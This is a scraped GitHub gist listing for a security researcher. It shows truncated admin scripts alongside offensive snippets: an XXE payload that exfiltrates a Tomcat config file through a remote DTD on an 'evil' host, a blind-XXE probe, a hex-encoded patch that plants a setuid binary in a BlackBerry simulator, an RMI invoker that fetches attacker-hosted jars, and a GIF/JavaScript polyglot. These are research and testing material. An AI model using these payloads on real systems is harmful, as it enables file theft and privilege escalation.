Skip to content

Instantly share code, notes, and snippets.

Etienne Stalmans staaldraad

Block or report user

Report or block staaldraad

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
staaldraad / setWireshark
Last active Aug 29, 2015
Run wireshark without having to be root
View setWireshark
if [ "$1" != "" ]; then
echo "ERROR: no username supplied"
echo "Using current user"
staaldraad / vmware_installfix
Created Feb 22, 2014
VWare Workstation 10 on Fedora 20 or kernel 3.13+ systems
View vmware_installfix
# Ensure all kernel headers are installed
yum install kernel-devel kernel-headers
# Make a copy of version.h to a location known to Vmware
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/
#fix vmnet build
cd /usr/lib/vmware/modules/source/
curl -o vmware-netfilter.patch
tar xf vmnet.tar
staaldraad / gist:2f0d2ba4aa6afb0dd36f
Last active Aug 29, 2015
Update kernel paths for Ubuntu + vmware-player
View gist:2f0d2ba4aa6afb0dd36f
vmware-installer -u vmware-player
staaldraad /
Last active Aug 29, 2015
Setup crypt container
#create new file to use as container
#dd if=/dev/zero of=/out count=5000k
fallocate -l 1G test.img
#create luks wrapper
cryptsetup -v -y luksFormat /out
cryptsetup luksOpen /out cryptname
cryptsetup -v status cryptname
#make into filesystem
staaldraad /
Created Jun 18, 2014
Root Blackberry Simulator
perl -i.backup -0777 -pe 's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g' BlackBerry10Simulator-s001.vmdk
staaldraad / xxe
Created Jul 7, 2014
XXE remote dtd
View xxe
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
staaldraad /
Last active Dec 1, 2018
Quick and dirty RMI invoker
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <>
Version: 08/10/2014 - v0.1
import socket
import binascii
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
staaldraad / poodle-tls-go.patch
Created Dec 9, 2014
Patch Go libs for poodle-tls scan - Modified from to work with Go 1.3.3 for Linux. -- These are mods to Adam Langley's (@agl__) work.
View poodle-tls-go.patch
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go
--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100
+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000
@@ -301,6 +301,8 @@
// be used.
CurvePreferences []CurveID
+ BreakCBCPadding bool
serverInitOnce sync.Once // guards calling (*Config).serverInit
staaldraad / gifjs
Created Jan 4, 2015
GIF that is also Javascript (via Ange Albertini at 31C3 -
View gifjs
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,..
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../*.....;*/=1;a
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello");
You can’t perform that action at this time.